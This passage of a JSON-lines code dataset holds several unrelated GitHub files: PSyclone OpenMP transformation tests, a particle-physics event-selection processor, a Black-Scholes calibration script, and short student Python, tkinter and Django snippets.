schedule 'dynamic,' has an invalid chunk-size.\"\n in str(err.value))\n\n\ndef test_parallellooptrans_validate_dependencies(fortran_reader):\n ''' Test that the parallellooptrans validation checks for loop carried\n dependencies. '''\n\n def create_loops(body):\n psyir = fortran_reader.psyir_from_source(f'''\n subroutine my_subroutine()\n integer :: ji, jj, jk, jpkm1, jpjm1, jpim1\n real, dimension(10, 10, 10) :: zwt, zwd, zwi, zws\n real :: total\n {body}\n end subroutine''')\n return psyir.walk(Loop)\n\n # Use OMPLoopTrans as a concrete class of ParallelLoopTrans\n omplooptrans = OMPLoopTrans()\n # Example with a loop carried dependency in jk dimension\n loops = create_loops('''\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n zwt(ji,jj,jk) = zwd(ji,jj,jk) - zwi(ji,jj,jk) * &\n zws(ji,jj,jk - 1) / zwt(ji,jj,jk - 1)\n enddo\n enddo\n enddo''')\n\n # Check that the loop can not be parallelised due to the loop-carried\n # dependency.\n with pytest.raises(TransformationError) as err:\n omplooptrans.validate(loops[0])\n assert (\"Transformation Error: Dependency analysis failed with the \"\n \"following messages:\\nError: The write access to 'zwt(ji,jj,jk)' \"\n \"and to 'zwt(ji,jj,jk - 1)' are dependent and cannot be \"\n \"parallelised\" in str(err.value))\n\n # However, the inner loop can be parallelised because the dependency is\n # just with 'jk' and it is not modified in the inner loops\n omplooptrans.validate(loops[1])\n\n # Reductions also indicate a data dependency that needs to be handled, so\n # we don't permit the parallelisation of the loop (until we support\n # reduction clauses)\n loops = create_loops('''\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n total = total + zwt(ji,jj,jk)\n enddo\n enddo\n enddo''')\n with pytest.raises(TransformationError) as err:\n omplooptrans.validate(loops[0])\n assert (\"Transformation Error: Dependency analysis failed with the \"\n \"following messages:\\nWarning: Variable 'total' is read first, \"\n \"which indicates a reduction.\" in str(err.value))\n\n # Shared scalars are race conditions but these are accepted because it\n # can be manage with the appropriate clause\n loops = create_loops('''\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n total = zwt(ji,jj,jk)\n enddo\n enddo\n enddo''')\n assert not DependencyTools().can_loop_be_parallelised(loops[0])\n omplooptrans.validate(loops[0])\n\n\ndef test_omplooptrans_apply_firstprivate(fortran_reader, fortran_writer,\n tmpdir):\n ''' Test applying the OMPLoopTrans in cases where a firstprivate\n clause is needed to generate code that is functionally equivalent to the\n original, serial version.'''\n\n # Example with a conditional write and a OMPParallelDoDirective\n psyir = fortran_reader.psyir_from_source('''\n module my_mod\n contains\n subroutine my_subroutine()\n integer :: ji, jj, jk, jpkm1, jpjm1, jpim1, scalar1, scalar2\n real, dimension(10, 10, 10) :: zwt, zwd, zwi, zws\n scalar1 = 1\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n if (.true.) then\n scalar1 = zwt(ji,jj,jk)\n endif\n scalar2 = scalar1 + zwt(ji,jj,jk)\n zws(ji,jj,jk) = scalar2\n enddo\n enddo\n enddo\n end subroutine\n end module my_mod''')\n omplooptrans = OMPParallelLoopTrans()\n loop = psyir.walk(Loop)[0]\n omplooptrans.apply(loop)\n expected = '''\\\n !$omp parallel do default(shared), private(ji,jj,jk,scalar2), \\\nfirstprivate(scalar1), schedule(auto)\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n if (.true.) then\n scalar1 = zwt(ji,jj,jk)\n end if\n scalar2 = scalar1 + zwt(ji,jj,jk)\n zws(ji,jj,jk) = scalar2\n enddo\n enddo\n enddo\n !$omp end parallel do\\n'''\n\n gen = fortran_writer(psyir)\n assert expected in gen\n assert Compile(tmpdir).string_compiles(gen)\n\n\ndef test_omplooptrans_apply_firstprivate_fail(fortran_reader):\n ''' Test applying the OMPLoopTrans in cases where a firstprivate\n clause it is needed to generate functionally equivalent code than\n the starting serial version.\n\n In some cases the transformation validate dependency analysis reports\n the firstprivate use as a reduction, which is wrong.\n\n '''\n\n # Example with a read before write and a OMPParallelDirective\n psyir = fortran_reader.psyir_from_source('''\n subroutine my_subroutine()\n integer :: ji, jj, jk, jpkm1, jpjm1, jpim1, scalar1, scalar2\n real, dimension(10, 10, 10) :: zwt, zwd, zwi, zws\n do jk = 2, jpkm1, 1\n do jj = 2, jpjm1, 1\n do ji = 2, jpim1, 1\n scalar2 = scalar1 + zwt(ji,jj,jk)\n scalar1 = 3\n zws(ji,jj,jk) = scalar2 + scalar1\n enddo\n enddo\n enddo\n end subroutine''')\n omplooptrans = OMPParallelLoopTrans()\n loop = psyir.walk(Loop)[0]\n try:\n omplooptrans.apply(loop)\n except TransformationError:\n # TODO #598: When this is solved, this test can be removed and the\n # \"force\":True in the previous test can also be removed\n pytest.xfail(reason=\"Issue #598: This example should be a firstprivate\"\n \" but the dependency analysis believes it is a \"\n \"reduction.\")\n\n\ndef test_omplooptrans_apply(sample_psyir, fortran_writer):\n ''' Test OMPLoopTrans works as expected with the different options. '''\n\n # By default it adds a OMPDoDirective with static schedule\n omplooptrans = OMPLoopTrans()\n tree = sample_psyir.copy()\n omplooptrans.apply(tree.walk(Loop)[0])\n assert isinstance(tree.walk(Loop)[0].parent, Schedule)\n assert isinstance(tree.walk(Loop)[0].parent.parent, OMPDoDirective)\n assert tree.walk(Loop)[0].parent.parent._omp_schedule == 'auto'\n\n # The omp_schedule can be changed\n omplooptrans = OMPLoopTrans(omp_schedule=\"dynamic,2\")\n ompparalleltrans = OMPParallelTrans()\n tree = sample_psyir.copy()\n loop1 = tree.walk(Loop)[0]\n omplooptrans.apply(loop1)\n assert isinstance(loop1.parent, Schedule)\n assert isinstance(loop1.parent.parent, OMPDoDirective)\n assert loop1.parent.parent._omp_schedule == 'dynamic,2'\n ompparalleltrans.apply(loop1.parent.parent) # Needed for generation\n\n # The omp_directive can be changed\n omplooptrans = OMPLoopTrans(omp_directive=\"loop\")\n loop2 = tree.walk(Loop, stop_type=Loop)[1]\n omplooptrans.apply(loop2, {'collapse': 2})\n assert isinstance(loop2.parent, Schedule)\n assert isinstance(loop2.parent.parent, OMPLoopDirective)\n ompparalleltrans.apply(loop2.parent.parent) # Needed for generation\n\n # Check that the full resulting code looks like this\n expected = '''\n !$omp parallel default(shared), private(i,j)\n !$omp do schedule(dynamic,2)\n do i = 1, 10, 1\n do j = 1, 10, 1\n a(i,j) = 0\n enddo\n enddo\n !$omp end do\n !$omp end parallel\n !$omp parallel default(shared), private(i,j)\n !$omp loop collapse(2)\n do i = 1, 10, 1\n do j = 1, 10, 1\n a(i,j) = 0\n enddo\n enddo\n !$omp end loop\n !$omp end parallel\\n'''\n\n assert expected in fortran_writer(tree)\n\n\ndef test_ifblock_children_region():\n ''' Check that we reject attempts to transform the conditional part of\n an If statement or to include both the if- and else-clauses in a region\n (without their parent). '''\n acct = ACCParallelTrans()\n # Construct a valid IfBlock\n condition = Reference(DataSymbol('condition', BOOLEAN_TYPE))\n ifblock = IfBlock.create(condition, [], [])\n\n # Attempt to put all of the children of the IfBlock into a region. This\n # is an error because the first child is the conditional part of the\n # IfBlock.\n with pytest.raises(TransformationError) as err:\n super(ACCParallelTrans, acct).validate([ifblock.children[0]])\n assert (\"transformation to the immediate children of a Loop/IfBlock \"\n \"unless it is to a single Schedule\" in str(err.value))\n with pytest.raises(TransformationError) as err:\n super(ACCParallelTrans, acct).validate(ifblock.children[1:])\n assert (\" to multiple nodes when one or more is a Schedule. \"\n \"Either target a single Schedule or \" in str(err.value))\n\n\ndef test_regiontrans_wrong_children():\n ''' Check that the validate method raises the expected error if\n passed the wrong children of a Node. (e.g. those representing the\n bounds of a Loop.) '''\n # RegionTrans is abstract so use a concrete sub-class\n rtrans = ACCParallelTrans()\n # Construct a valid Loop in the PSyIR\n parent = Loop()\n parent.addchild(Literal(\"1\", INTEGER_TYPE))\n parent.addchild(Literal(\"10\", INTEGER_TYPE))\n parent.addchild(Literal(\"1\", INTEGER_TYPE))\n parent.addchild(Schedule())\n with pytest.raises(TransformationError) as err:\n RegionTrans.validate(rtrans, parent.children)\n assert (\"Cannot apply a transformation to multiple nodes when one or more \"\n \"is a Schedule\" in str(err.value))\n\n\ndef test_parallelregion_refuse_codeblock():\n ''' Check that ParallelRegionTrans.validate() rejects a loop nest that\n encloses a CodeBlock. We use OMPParallelTrans as ParallelRegionTrans\n is abstract. '''\n otrans = OMPParallelTrans()\n # Construct a valid Loop in the PSyIR with a CodeBlock in its body\n parent = Loop.create(DataSymbol(\"ji\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n Literal(\"10\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n [CodeBlock([], CodeBlock.Structure.STATEMENT,\n None)])\n with pytest.raises(TransformationError) as err:\n otrans.validate([parent])\n assert (\"Nodes of type 'CodeBlock' cannot be enclosed by a \"\n \"OMPParallelTrans transformation\" in str(err.value))\n\n\ndef test_parallellooptrans_refuse_codeblock():\n ''' Check that ParallelLoopTrans.validate() rejects a loop nest that\n encloses a CodeBlock. We have to use OMPParallelLoopTrans as\n ParallelLoopTrans is abstract. '''\n otrans = OMPParallelLoopTrans()\n # Construct a valid Loop in the PSyIR with a CodeBlock in its body\n parent = Loop.create(DataSymbol(\"ji\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n Literal(\"10\", INTEGER_TYPE),\n Literal(\"1\", INTEGER_TYPE),\n [CodeBlock([], CodeBlock.Structure.STATEMENT,\n None)])\n with pytest.raises(TransformationError) as err:\n otrans.validate(parent)\n assert (\"Nodes of type 'CodeBlock' cannot be enclosed \"\n \"by a OMPParallelLoopTrans transformation\" in str(err.value))\n\n\n# Tests for OMPSingleTrans\ndef test_ompsingle():\n ''' Generic tests for the OMPSingleTrans transformation class '''\n trans = OMPSingleTrans()\n assert trans.name == \"OMPSingleTrans\"\n assert str(trans) == \"Insert an OpenMP Single region\"\n\n assert trans.omp_nowait is False\n trans.omp_nowait = True\n assert trans.omp_nowait is True\n\n\ndef test_ompsingle_invalid_nowait():\n ''' Tests to check OMPSingle rejects invalid attempts\n to pass nowait argument '''\n trans = OMPSingleTrans()\n with pytest.raises(TypeError) as err:\n trans.omp_nowait = \"string\"\n assert (\"Expected nowait to be a bool but got a str\"\n in str(err.value))\n\n\ndef test_ompsingle_nested():\n ''' Tests to check OMPSingle rejects being applied to another OMPSingle '''\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH, \"single_invoke.f90\"),\n api=\"gocean1.0\")\n single = OMPSingleTrans()\n psy = PSyFactory(\"gocean1.0\", distributed_memory=False).\\\n create(invoke_info)\n schedule = psy.invokes.invoke_list[0].schedule\n\n single.apply(schedule[0])\n with pytest.raises(TransformationError) as err:\n single.apply(schedule[0])\n assert (\"Transformation Error: Nodes of type 'OMPSingleDirective' cannot\"\n \" be enclosed by a OMPSingleTrans transformation\"\n in str(err.value))\n\n\n# Tests for OMPMasterTrans\ndef test_ompmaster():\n ''' Generic tests for the OMPMasterTrans transformation class '''\n trans = OMPMasterTrans()\n assert trans.name == \"OMPMasterTrans\"\n assert str(trans) == \"Insert an OpenMP Master region\"\n\n\ndef test_ompmaster_nested():\n '''Tests to check OMPMasterTrans rejects being applied to another\n OMPMasterTrans'''\n\n _, invoke_info = parse(os.path.join(GOCEAN_BASE_PATH, \"single_invoke.f90\"),\n api=\"gocean1.0\")\n master = OMPMasterTrans()\n psy = PSyFactory(\"gocean1.0\", distributed_memory=False).\\\n create(invoke_info)\n schedule = psy.invokes.invoke_list[0].schedule\n\n # Successful transformation test\n node = schedule[0]\n master.apply(node)\n assert isinstance(schedule[0], OMPMasterDirective)\n assert schedule[0].dir_body[0] is node\n with pytest.raises(TransformationError) as err:\n master.apply(schedule[0])\n assert (\"Transformation Error: Nodes of type 'OMPMasterDirective' cannot\"\n \" be enclosed by a OMPMasterTrans transformation\"\n in str(err.value))\n\n\n# Tests for ProfileTrans\n\n\n@pytest.mark.parametrize(\"options\", [None, {\"invalid\": \"invalid\"},\n {\"region_name\": (\"mod\", \"reg\")}])\ndef test_profile_trans_name(options):\n '''Check that providing no option or an option not associated with the\n profile transformation does not result in anything being passed\n into ProfileNode via the name argument and that providing an\n option associated with the profile transformation does result in\n the relevant names being passed into ProfileNode via the name\n argument. This is checked by looking at the variables\n '_module_name' and '_region_name' which are set to the name\n argument values if they are provided, otherwise the variables are\n set to None.\n\n '''\n _, invoke = get_invoke(\"1_single_invoke.f90\", \"dynamo0.3\", idx=0)\n schedule = invoke.schedule\n profile_trans = ProfileTrans()\n if options:\n profile_trans.apply(schedule.children, options=options)\n else:\n profile_trans.apply(schedule.children)\n profile_node = schedule[0]\n if options and \"region_name\" in options:\n assert profile_node._module_name == \"mod\"\n assert profile_node._region_name == \"reg\"\n else:\n assert profile_node._module_name is None\n assert profile_node._region_name is None\n\n\n@pytest.mark.parametrize(\"value\", [None, [\"a\", \"b\"], (), (\"a\",),\n (\"a\", \"b\", \"c\"), (\"a\", []), ([], \"a\")])\ndef test_profile_trans_invalid_name(value):\n '''Invalid name supplied to options argument.'''\n profile_trans = ProfileTrans()\n\n # We need to have a schedule as parent, otherwise the node\n # (with no parent) will not be allowed.\n sched = Schedule()\n node = Statement(parent=sched)\n sched.addchild(node)\n with pytest.raises(TransformationError) as excinfo:\n profile_trans.apply(node, options={\"region_name\": value})\n assert (\"User-supplied region name must be a tuple containing \"\n \"two non-empty strings.\" in str(excinfo.value))\n","repo_name":"stfc/PSyclone","sub_path":"src/psyclone/tests/psyir/transformations/transformations_test.py","file_name":"transformations_test.py","file_ext":"py","file_size_in_byte":29370,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"35"} +{"seq_id":"4630609317","text":"# This file illustrates how to implement a processor, realizing the selection\n# steps and outputting histograms and a cutflow with efficiencies.\n# Here we create a very simplified version of the ttbar-to-dilep processor.\n# One can run this processor using\n# 'python3 -m pepper.runproc --debug example_processor.py example_config.json'\n# Above command probably will need a little bit of time before all cuts are\n# applied once. This is because a chunk of events are processed simultaneously.\n# You change adjust the number of events in a chunk and thereby the memory\n# usage by using the --chunksize parameter (the default value is 500000).\n\nimport pepper\nimport awkward as ak\nfrom functools import partial\n\n\n# All processors should inherit from pepper.ProcessorBasicPhysics\nclass Processor(pepper.ProcessorBasicPhysics):\n # We use the ConfigTTbarLL instead of its base Config, to use some of its\n # predefined extras\n config_class = pepper.ConfigTTbarLL\n\n def __init__(self, config, eventdir):\n # Initialize the class, maybe overwrite some config variables and\n # load additional files if needed\n # Can set and modify configuration here as well\n# config[\"histogram_format\"] = \"root\"\n # Need to call parent init to make histograms and such ready\n super().__init__(config, eventdir)\n config[\"histogram_format\"] = \"root\"\n\n # It is not recommended to put anything as member variable into a\n # a Processor because the Processor instance is sent as raw bytes\n # between nodes when running on HTCondor.\n\n def process_selection(self, selector, dsname, is_mc, filler):\n # Implement the selection steps: add cuts, define objects and/or\n # compute event weights\n\n # Add a cut only allowing events according to the golden JSON\n # The good_lumimask method is specified in pepper.ProcessorBasicPhysics\n # It also requires a lumimask to be specified in config\n era = self.get_era(selector.data, is_mc)\n if not is_mc:\n selector.add_cut(\"Lumi\", partial(\n self.good_lumimask, is_mc, dsname))\n\n # Only allow events that pass triggers specified in config\n # This also takes into account a trigger order to avoid triggering\n # the same event if it's in two different data datasets.\n pos_triggers, neg_triggers = pepper.misc.get_trigger_paths_for(\n dsname, is_mc, self.config[\"dataset_trigger_map\"],\n self.config[\"dataset_trigger_order\"])\n selector.add_cut(\"Trigger\", partial(\n self.passing_trigger, pos_triggers, neg_triggers))\n\n if is_mc and self.config[\"year\"] in (\"2016\", \"2017\", \"ul2016pre\",\n \"ul2016post\", \"ul2017\"):\n selector.add_cut(\"L1 prefiring\", self.add_l1_prefiring_weights)\n\n selector.add_cut(\"MET filters\", partial(self.met_filters, is_mc))\n\n # Pick electrons satisfying our criterias\n selector.set_multiple_columns(self.pick_electrons)\n # Pick muons satisfying our criterias\n selector.set_multiple_columns(self.pick_muons)\n\n selector.set_cat(\"channel\",{\"ele\", \"muon\"})\n selector.set_multiple_columns(self.lepton_categories)\n\n # Combine electron and muon to lepton\n selector.set_column(\"Lepton\", partial(self.build_lepton_column, is_mc, selector.rng))\n\n # Only accept events that have one lepton and not have extra leptons\n selector.add_cut(\"oneLepton\", self.one_good_lepton)\n\n # Pick photons satisfying our criterias\n selector.set_column(\"Photon\", self.pick_medium_photons)\n\n # Only accept events that have at least one lepton\n selector.add_cut(\"atLeastOnePhoton\",self.one_good_photon)\n selector.set_column(\"mlg\",self.mass_lg) \n\n # Pick Jets satisfying our criterias\n selector.set_column(\"Jet\", partial(self.build_jet_column, is_mc)) \n selector.set_column(\"bJet\", self.build_bjet_column) \n selector.set_column(\"nbtag\", self.num_btags)\n\n # Only accept events that have at least two jets and one bjet\n selector.add_cut(\"atLeast2jets\",self.has_jets)\n\n # HEM issue cut\n if (self.config[\"hem_cut_if_ele\"] or self.config[\"hem_cut_if_muon\"]\n or self.config[\"hem_cut_if_jet\"]):\n selector.add_cut(\"HEM cut\", self.hem_cut)\n\n # Build MET column\n smear_met = \"smear_met\" in self.config and self.config[\"smear_met\"]\n variation = self.get_jetmet_nominal_arg()\n selector.set_column(\"OrigJet\", selector.data[\"Jet\"])\n selector.set_column(\n \"MET\", partial(self.build_met_column, is_mc, variation.junc,\n variation.jer if smear_met else None, selector.rng,\n era, variation=variation.met))\n # Only accept events with MET pt more than 20 GeV\n selector.add_cut(\"Req MET\", self.met_requirement)\n selector.add_cut(\"atLeast1bjet\",partial(self.btag_cut, is_mc))\n\n # Build different categories according to the number of jets\n# selector.set_cat(\"jet_btag\", {\"j2+_b0\", \"j2_b1\", \"j3+_b1\", \"j2_b2+\", \"j3+_b2+\"})\n# selector.set_multiple_columns(self.btag_categories)\n\n \n def pick_electrons(self, data):\n ele = data[\"Electron\"]\n\n # We do not want electrons that are between the barrel and the end cap\n # For this, we need the eta of the electron with respect to its\n # supercluster\n sc_eta_abs = abs(ele.eta + ele.deltaEtaSC)\n is_in_transreg = (1.444 < sc_eta_abs) & (sc_eta_abs < 1.566)\n\n # Electron ID, as an example we use the MVA one here\n# has_id = ele.mvaFall17V2Iso_WP90\n has_id = ele.cutBased >= 3\n\n # Finally combine all the requirements\n is_good = (\n has_id\n & (~is_in_transreg)\n & (self.config[\"ele_eta_min\"] < ele.eta)\n & (ele.eta < self.config[\"ele_eta_max\"])\n & (self.config[\"good_ele_pt_min\"] < ele.pt))\n \n veto_id = ele.cutBased >=1\n\n is_veto = (\n veto_id\n & (~is_in_transreg)\n & (self.config[\"ele_eta_min\"] < ele.eta)\n & (ele.eta < self.config[\"ele_eta_max\"])\n & (self.config[\"veto_ele_pt_min\"] < ele.pt))\n\n # Return all electrons with are deemed to be good\n return {\"Electron\": ele[is_good], \"VetoEle\": ele[is_veto]}\n\n def pick_muons(self, data):\n muon = data[\"Muon\"]\n etacuts = (self.config[\"muon_eta_min\"] < muon.eta) & (muon.eta < self.config[\"muon_eta_max\"])\n\n good_id = muon.tightId\n good_iso = muon.pfIsoId > 3\n is_good = (\n good_id\n & good_iso\n & etacuts\n & (self.config[\"good_muon_pt_min\"] < muon.pt))\n \n veto_id = muon.looseId\n veto_iso = muon.pfIsoId > 1\n is_veto = (\n veto_id\n & veto_iso\n & etacuts\n & (self.config[\"veto_muon_pt_min\"] < muon.pt))\n\n return {\"Muon\": muon[is_good], \"VetoMuon\": muon[is_veto]}\n\n def pick_medium_photons(self, data):\n photon = data[\"Photon\"]\n leptons = data[\"Lepton\"]\n has_id = photon.cutBased>1\n pass_psv = (photon.pixelSeed==False)\n\n eta_abs = abs(photon.eta)\n is_in_transreg = (1.4442 < eta_abs) & (eta_abs < 1.566)\n \n etacuts = (abs(photon[\"eta\"])<2.5)\n ptcuts = (photon.pt>15)\n\n has_lepton_close = ak.any(\n photon.metric_table(leptons) < 0.4, axis=2)\n\n is_good = (\n has_id\n\t & (~has_lepton_close)\n & pass_psv\n & etacuts\n & (~is_in_transreg)\n & ptcuts)\n\n return photon[is_good]\n\n def good_jet(self, data):\n \"\"\"Apply some basic jet quality cuts.\"\"\"\n jets = data[\"Jet\"]\n leptons = data[\"Lepton\"]\n photons = data[\"Photon\"]\n\n j_id, j_puId, lep_dist, pho_dist, eta_min, eta_max, pt_min = self.config[[\n \"good_jet_id\", \"good_jet_puId\", \"good_jet_lepton_distance\", \"good_jet_photon_distance\",\n \"good_jet_eta_min\", \"good_jet_eta_max\", \"good_jet_pt_min\"]]\n\n if j_id == \"skip\":\n has_id = True\n elif j_id == \"cut:loose\":\n has_id = jets.isLoose\n # Always False in 2017 and 2018\n elif j_id == \"cut:tight\":\n has_id = jets.isTight\n elif j_id == \"cut:tightlepveto\":\n has_id = jets.isTightLeptonVeto\n else:\n raise pepper.config.ConfigError(\n \"Invalid good_jet_id: {}\".format(j_id))\n\n if j_puId == \"skip\":\n has_puId = True\n elif j_puId == \"cut:loose\":\n has_puId = ak.values_astype(jets[\"puId\"] & 0b100, bool)\n elif j_puId == \"cut:medium\":\n has_puId = ak.values_astype(jets[\"puId\"] & 0b10, bool)\n elif j_puId == \"cut:tight\":\n has_puId = ak.values_astype(jets[\"puId\"] & 0b1, bool)\n else:\n raise pepper.config.ConfigError(\n \"Invalid good_jet_id: {}\".format(j_puId))\n\n # Only apply PUID if pT < 50 GeV\n has_puId = has_puId | (jets.pt >= 50)\n\n j_pt = jets.pt\n if \"jetfac\" in ak.fields(data):\n jets[\"pt\"] = jets[\"pt\"] * data[\"jetfac\"][is_good_jet]\n jets[\"mass\"] = jets[\"mass\"] * data[\"jetfac\"][is_good_jet]\n jets = jets[ak.argsort(jets[\"pt\"], ascending=False)]\n\n has_lepton_close = ak.any(\n jets.metric_table(leptons) < lep_dist, axis=2)\n has_photon_close = ak.any(\n jets.metric_table(photons) < pho_dist, axis=2) \n\n return (has_id & has_puId\n & (~has_lepton_close)\n & (~has_photon_close)\n & (eta_min < jets.eta)\n & (jets.eta < eta_max)\n & (pt_min < j_pt))\n \n def build_bjet_column(self,data):\n\n jets = data[\"Jet\"]\n bjets = jets[data[\"Jet\"].btagged]\n\n return bjets\n\n def one_good_muon(self, data):\n return (ak.num(data[\"Muon\"]) == 1) & (ak.num(data[\"VetoMuon\"]) == 1)\n \n def one_good_ele(self, data):\n return (ak.num(data[\"Electron\"]) == 1) & (ak.num(data[\"VetoEle\"]) == 1)\n \n def one_good_lepton(self, data):\n return ((ak.num(data[\"Muon\"]) == 1) & (ak.num(data[\"VetoMuon\"]) == 1)) | ((ak.num(data[\"Electron\"]) == 1) & (ak.num(data[\"VetoEle\"]) == 1))\n\n def one_good_photon(self,data):\n return ak.num(data[\"Photon\"])>0\n \n def num_btags(self, data):\n return ak.num(data['bJet'])\n\n def lepton_categories(self,data):\n \n cat = {}\n nele = ak.num(data['VetoEle'])\n nmuon = ak.num(data['VetoMuon'])\n\n cat['ele'] = (nele==1) & (nmuon==0)\n cat['muon'] = (nele==0) & (nmuon==1)\n\n return cat\n\n def btag_categories(self,data):\n \n cats = {}\n \n num_btagged = data[\"nbtag\"]\n njet = ak.num(data[\"Jet\"])\n\n cats[\"j2+_b0\"] = (num_btagged == 0) & (njet == 2)\n cats[\"j2_b1\"] = (num_btagged == 1) & (njet == 2)\n cats[\"j3+_b1\"] = (num_btagged == 1) & (njet > 2)\n cats[\"j2_b2+\"] = (num_btagged >= 2) & (njet == 2)\n cats[\"j3+_b2+\"] = (num_btagged >= 2) & (njet > 2)\n\n\n return cats\n\n def met_requirement(self, data):\n met = data[\"MET\"].pt\n return met > self.config[\"met_min_met\"]\n\n def mass_lg(self, data):\n \"\"\"Return invariant mass of lepton plus photon\"\"\"\n return (data[\"Lepton\"][:, 0] + data[\"Photon\"][:, 0]).mass\n\n def opposite_sign_lepton_pair(self, data):\n # At this point we only have events with exactly two leptons, but now\n # we want only events where they have opposite charge\n\n # First concatenate the charge of our electron(s) and our muon(s)\n # into one array\n charge = ak.concatenate(\n [data[\"Electron\"].charge, data[\"Muon\"].charge], axis=1)\n\n # Now in this array we can simply compare the first and the second\n # element. Note that this is done on axis 1, axis 0 is always used for\n # event indexing, e.g. you would compare charges from event 0 and 1 if\n # you do charge[0] != charge[1]\n return charge[:, 0] != charge[:, 1]\n\n def lepton_pair(self, data):\n # We only want events with excatly two leptons, thus look at our\n # electron and muon counts and pick events accordingly\n return ak.num(data[\"Electron\"]) + ak.num(data[\"Muon\"]) == 2\n \n","repo_name":"hbecerri/tgamma_singlelep","sub_path":"example/example_processor.py","file_name":"example_processor.py","file_ext":"py","file_size_in_byte":12561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34939011641","text":"import numpy as np\nfrom scipy.optimize import minimize, leastsq\nimport matplotlib.pyplot as plt\nfrom CompFinTutorial.Functions import BS_EuCall_FFT\n\n# the data set must have strike prices in first column, maturities in the second and prices in the third column!!!!!!\ndef BS_EuCall_Calibrate (S0, r, data, sigma0, R, N, M):\n # defining function to be minimized\n def loss_function(x):\n T = np.unique(data[:, 1])\n for j in T:\n ind = np.where(data[:, 1] == j)\n K = data[ind, 0] # set coresponding strikes\n v0 = BS_EuCall_FFT(S0, r, sigma=x, T=j, t=0, R=R, N=N, M=M, K=K) # BS_EuCall_FFT now returns prices coresponding to input strike K\n # calculate MSE\n mse = ((data[ind, 2] - v0)**2).mean()\n return mse\n # minimize loss function with respect to sigma\n optSigma = leastsq(loss_function, sigma0)\n return optSigma\n\n\n\n\n# import Data\nprices = np.genfromtxt(\"Data/Dax_CallPrices_Eurex.csv\", delimiter=\";\", skip_header=True, )\n\n# set test parameters\nS0 = 12658\nr = 0.05\nsigma0 = 0.3\nR = 1.1\nN = 2**11\nM = 50\n\nopt = BS_EuCall_Calibrate (S0, r, prices, sigma0, R, N, M)\nprint(opt)\n\nsigma = opt[0]\n\nT = np.unique(prices[:,1])\nfor j in T:\n ind = np.where(prices[:, 1] == j)\n K = prices[ind, 0] # set coresponding strikes\n v0 = BS_EuCall_FFT(S0, r, sigma=sigma, T=j, t=0, R=R, N=N, M=M, K=K)\n obs = prices[ind, 2]\n plt.plot(K[0, :], v0[0, :], \"-\")\nplt.xlabel(\"Strike\")\nplt.ylabel(\"Price\")\nTr = np.round(T, 4)\nplt.plot(prices[:, 0], prices[:, 2], \"x\", color=\"black\")\nplt.legend([\"T=\"+str(Tr[0]), \"T=\"+str(Tr[1]), \"T=\"+str(Tr[2]), \"T=\"+str(Tr[3]), \"T=\"+str(Tr[4])])\nplt.title(\"Calibrated prices vs observed prices BS-model\")\nplt.show()\n\n\n\n\n\n","repo_name":"Simbold/ComputationalFinanceTutorial","sub_path":"Exercise_19.py","file_name":"Exercise_19.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37659034729","text":"students=[\n {\"name\": \"Hermoine\", \"house\": \"gryffindoor\"},\n {\"name\": \"Harry\", \"house\": \"gryffindoor\"},\n {\"name\": \"Ron\", \"house\": \"gryffindoor\"},\n {\"name\": \"draco\", \"house\": \"Slythrin\"},\n {\"name\": \"Padma\", \"house\": \"Ravenclaw\"},\n]\n# what are the unique houses in which they live \n#so keeping in mind that if we loop it through dict then the houses might repeat themselves \n#to approch this problem we can use \"sets\"\n#but first lets see how its done without sets\n\n#======================================================\n# houses=[]\n\n# for student in students:\n# if student[\"house\"] not in [houses]:\n# houses.append(student[\"house\"])\n\n\n# for house in sorted(houses):\n # print(house)\n#=====================================================\n\nhouses= set()\n\nfor student in students:\n houses.add(student[\"house\"])\n \nfor house in sorted(houses):\n print(house)\n \n","repo_name":"swapnilAngarkhe/cs50UnOfficial","sub_path":"python_cs50/week9/houses.py","file_name":"houses.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13879792500","text":"import tkinter as df\r\nfile_0 = open('1_1.txt').read().split()\r\nlst = []\r\ndef gf():\r\n for i in file_0:\r\n if i.isdigit():\r\n lst.append(int(i))\r\n sum(lst) \r\n df.Label(win, text = f\"Ответ: {sum(lst)}\").pack()\r\n\r\nwin = df.Tk()\r\nbtn_1 = df.Button(win, text = \"нажмите на меня\", command = gf).pack()\r\nwin.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Tenchmarn/Python_LGU","sub_path":"LB_3_(10.09.2022)/Задание_1_вр(1).py","file_name":"Задание_1_вр(1).py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21257808734","text":"from django.urls import path\nfrom django.contrib import admin\n\n\nfrom accounts.views import (register_view,\n\t\t\t\t\t\t\tlogin_view,\n\t\t\t\t\t\t\t# RegisterView,\n\t\t\t\t\t\t\tlogout_view,\n\t\t\t\t\t\t\t)\n\nurlpatterns = [\n # path('register/', RegisterView.as_view(), name='register'),\n path('register/', register_view, name='register'),\n\tpath('login/', login_view, name='login'),\n path('logout/', logout_view, name='logout'),\n]","repo_name":"priyesh-04/blog","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18522355905","text":"saque = saqueRest = 0\r\n\r\nprint('-='*15)\r\nprint(' BBM')\r\n\r\nwhile True:\r\n print('-=' * 15)\r\n saque = int(input('Digite o valor a ser sacado: '))\r\n print('-' * 30)\r\n 